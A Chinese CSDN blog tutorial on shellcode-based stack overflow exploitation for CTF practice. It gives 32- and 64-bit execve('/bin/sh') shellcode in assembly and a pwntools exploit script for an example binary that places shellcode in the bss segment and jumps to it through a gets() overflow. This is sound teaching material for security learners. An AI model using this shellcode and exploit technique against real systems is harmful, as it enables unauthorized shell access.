二进制学习(pwn)-shellcode

最新推荐文章于 2024-06-02 12:09:18 发布
最新推荐文章于 2024-06-02 12:09:18 发布
阅读量1.5k 收藏 10
点赞数 1
文章标签: 学习 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liulanghouzi/article/details/126982991
版权

安装好了pwntool、ROPgadget、onegadget以及pwngdb,读懂并手写脚本复现了上一篇中基于64位有后门的栈溢出漏洞,恭喜你少年,你已经完成二进制的筑基啦。接下来,我们要介绍的是栈溢出的第二种利用形式:基于shellcode的栈溢出。

在编程语言中要想获得系统执行权限,可以使用system('/bin/sh')。该函数是基于系统函数execve('/bin/sh',0,0),编译为机器码后运行就可以getshell。而shellcode就相当于execve('/bin/sh',0,0)的机器码,如果程序中没有提供类似于system('/bin/sh')这样的后门,那么我们完全可以向一个具有可执行权限的内存区域中传入shellcode来达到同样的效果。

  • 32位shellcode编写

32位系统调用命令是int 0x80,execve的调用号是0xb(由eax记录),三个参数'/bin/sh',0,0分别由ebx,ecx和edx记录。

section .text    global _start_start:    xor ecx,ecx;    xor edx,edx;    xor eax,eax;    push eax;#使得/bin/sh后面出现00,截断字符串    push "//sh";#占位防止出现00    push "/bin";    mov ebx,esp;    mov al,0xb;#直接将0xb赋值给eax高位,防止高位补0    int 0x80;

  • 64位shellcode编写

64位系统调用命令是syscall,execve的调用号是59(由rax记录),三个参数'/bin/sh',0,0分别由rdi,rsi和rdx记录。

section .text    global _start_start:    xor rsi,rsi;    xor rdx,rdx;    xor rbx,rbx;#传入00,便于截断    push rbx;    mov rbx,"/bin//sh";#长度超过32位,只能通过寄存器传参,加/补位    push rbx;    mov rdi,rsp;    mov al,59;    syscall;

以上两种shellcode都是采用系统调用实现execve('/bin/sh',0,0),能理解即可,不用刻意去记。当然不理解也没关系,pwntool中内置了生成shellcode的函数。在32位环境下使用asm(shellcraft.sh()),在64位环境下使用asm(shellcraft.amd64.sh()),即可生成shellcode。

下面给出一道基于shellcode的64位栈溢出例题,结合题目直观了解一下shellcode的使用方法。

       

可以看到程序中存在两个输入函数,read()和gets()。read输入函数的数据存在name处,且name位于bss段。

gets输入函数的数据则放在栈中,由于对输入长度没有限制,所以存在栈溢出。

当程序没有开启pie时,栈的位置是随机的,但是bss段的地址是固定的。因此本题的思路是在第一个输入函数read()处放shellcode,在第二个输入函数gets()处栈溢出调整到bss段,执行shellcode获取服务权限。

#!/usr/bin/python#coding=utf-8from pwn import *from LibcSearcher import *
local_file  = 'level1'#choose right lib according to the elflocal_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'#local_libc  = '/lib/i386-linux-gnu/libc-2.23.so'remote_libc = local_libcis_local = Falseis_remote = False
if len(sys.argv) == 1:    is_local = True    p = process(local_file)    libc = ELF(local_libc)elif len(sys.argv) > 1:    is_remote = True    if len(sys.argv) == 3:        host = sys.argv[1]        port = sys.argv[2]    else:        host, port = sys.argv[1].split(':')    p = remote(host, port)    libc = ELF(remote_libc)
elf = ELF(local_file)context.log_level = 'debug'context.arch = elf.archp.recvuntil("tell me your name\n")payload=asm(shellcraft.amd64.sh())p.sendline(payload)p.recvuntil("What do you want to say to me?\n")payload="A"*0x28+p64(0x601080)p.sendline(payload)p.interactive()

从31行开始进入我们的核心代码。首先接收消息,然后生成shellcode通过read函数写入bss段。再接收消息,在把栈填满后返回地址放置0x601080(bss段地址)实现跳转执行shellcode。

本期二进制学习分享就到这里啦,题目链接可以关注"断剑重铸"公众号查看pwn学习的浇水篇,有问题可随时通过公众号留言哦~

 

羊刀赵信就是猛
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Python库 | pwn-machine-1.1.tar.gz
03-11
2. **二进制分析**:可能包含用于分析二进制文件(如ELF或PE)的工具,以识别潜在的漏洞和入口点。 3. **内存管理**:可能提供内存操作函数,帮助开发者在内存中寻找和利用漏洞。 4. **编码解码**:为了绕过安全...
shellcode基本知识(PWN
weixin_51758733的博客
07-15 817
shellcode基本知识(PWN
简单的PWN学习-ret2shellcode
weixin_48421613的博客
07-05 811
最近在学习pwn,这是一道2016年的pwn题目,主要学习关于栈溢出以及劫持栈指针达到命令执行的效果,笔者水平较差,请轻喷
LitCTF 2024 pwn AK
最新发布
YX-hueimie
06-02 1356
探姬姐姐办的比赛,所以就打了一下。尽管是“新生赛”,但pwn方向并不是很新生,5道堆题+1道栈题,可能是出题的师傅比较少吧,应该是只有两位。我了解到这个比赛的时候已经要开赛了,投稿也来不及,要不然就投几道我的得意门生了。
PWN知识点整理(1)Shellcode
qq_52469954的博客
10-26 214
0day安全:软件漏洞分析技术(第2版)
pwn 手写Shellcode保姆级教程★
YX-hueimie
10-20 2715
本文章为手写Shellcode的教程,本文章将会围绕 NewStarCTF 2023 WEEK2 中的shellcode revenge一题展开,深入浅出带你一起编写shellcode。学完本文章,你将会有以下收获:加深对shellcode的理解,提升shellcode的编写能力,提升汇编能力,熟练掌握“异或”操作。
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2052
pwn 入门
basics-of-pwn:我的课程是有关基本的二进制漏洞利用的。:diving_mask:
04-12
基本知识我的课程是关于基本的二进制漏洞利用的。目录[堆栈溢出] [跳转到任意地址] [Shellcode编写] [NOP链] [使用python pwntools模块轻松利用堆栈溢出] [格式化字符串漏洞] [格式化字符串说明符] [读取任意数据] ...
pwn入门题目汇总.rar
09-01
1. **漏洞分析**:通过阅读和分析目标程序的源代码或二进制文件,找到可能的溢出点。 2. **漏洞复现**:编写输入数据以触发溢出,验证其存在。 3. **返回地址控制**:通过溢出改变返回地址,使得程序跳转到攻击者...
PWN不欢沙龙演讲PPT.rar
05-20
7. **二进制逆向工程**:理解程序的内部工作原理,包括指令集、函数调用、内存分配等,对于找到和利用漏洞至关重要。 8. **调试技巧**:学会使用GDB、OllyDbg等调试器是PWN学习过程中的重要技能,可以帮助分析程序...
libc-database
04-16
在网络安全领域,尤其是CTF(Capture The Flag)竞赛和Pwn二进制利用)类别中,对libc库的理解和利用是至关重要的。"libc-database"是一个专门收录了大量libc库的资源集合,它为开发者和安全研究人员提供了丰富的...
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
PWN · ret2shellcode】[HNCTF 2022 Week1]ret2shellcode
Mr_Fmnwon的博客
04-25 2727
ret2shellcode——顾名思义,控制执行流到shellcode在更简单的一类题目ret2text中,我们主要的尝试是修改某个返回地址修改,修改到程序固有的后门函数处,劫持程序控制流以期返回后门。然而,如果程序中并不存在这样的后门函数,那么很朴素的想法是,能不能自己写一段后门函数,然后劫持程序控制流返回执行这段恶意代码呢?依此,主要的过程如下:(1)构造shellcode通过溢出放到程序某片存储空间上——为了能够执行这段代码,所存储的区域需要有可执行的权限。
PWN-shellcode
MuMuLee_的博客
09-26 1770
构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖掉正常的返回地址。 题目: 1Ch=16+12=28,+esp=32:偏移量是32 能溢出:100-0x1c-4=68字节 C伪代码: 理论基础 函数返回步骤 : 保存返回值:函数返回值保存在EAX寄存器 弹出当前栈帧,恢复上一个栈帧 a) ESP + 当前栈帧大小:堆栈平衡基础上,降低栈顶,回收当前栈帧空间...
PWN入门(6)写入shellcode
Ba1_Ma0的博客
09-20 1931
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入05文件夹。
pwn学习pwn中的简单shellcode
Morphy_Amo的博客
12-20 1154
编写简单的shellcode 在linux32位系统中,最简单的获取shell的方式是通过系统调用execve获得 execve('/bin/sh',0,0); 写成汇编的话如下: global _start _start: xor edx, edx xor ecx, ecx push '/sh' push '/bin' mov ebx, esp mov eax, 0xb int 80h 编译
第二道pwn题:shellcode
小白垃圾笔记2
03-08 676
rbp:保存的是栈中当前执行函数的基本地址。当前执行函数所有存储在。这里使用了视频说这里用了 call rax所以不能用F5。查看文件类型和保护,虽然现在的我·还没有明白太多的保护。那么如果我们输入shellcode不久获取到了权限了吗。最重要的是最后,call rax,[rbp+buf]栈上的数据都要靠rbp指针加上偏移量来读取。rsp:栈指针,永远指向栈顶。他的意思就是执行输入的内容。64位,放到ida里边。
PWN --- ret2shellcode
qq_41696518的博客
06-28 866
PWN ret2shellcode
CTF二进制学习路线
07-27
CTF二进制学习路线可以按照以下步骤进行: 1. 入门逆向工具:首先,你可以学习一些逆向工具,比如IDA Pro和Ghidra。这些工具可以帮助你分析和理解二进制文件的结构和功能。\[2\] 2. 学习数据结构和算法:在进行CTF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值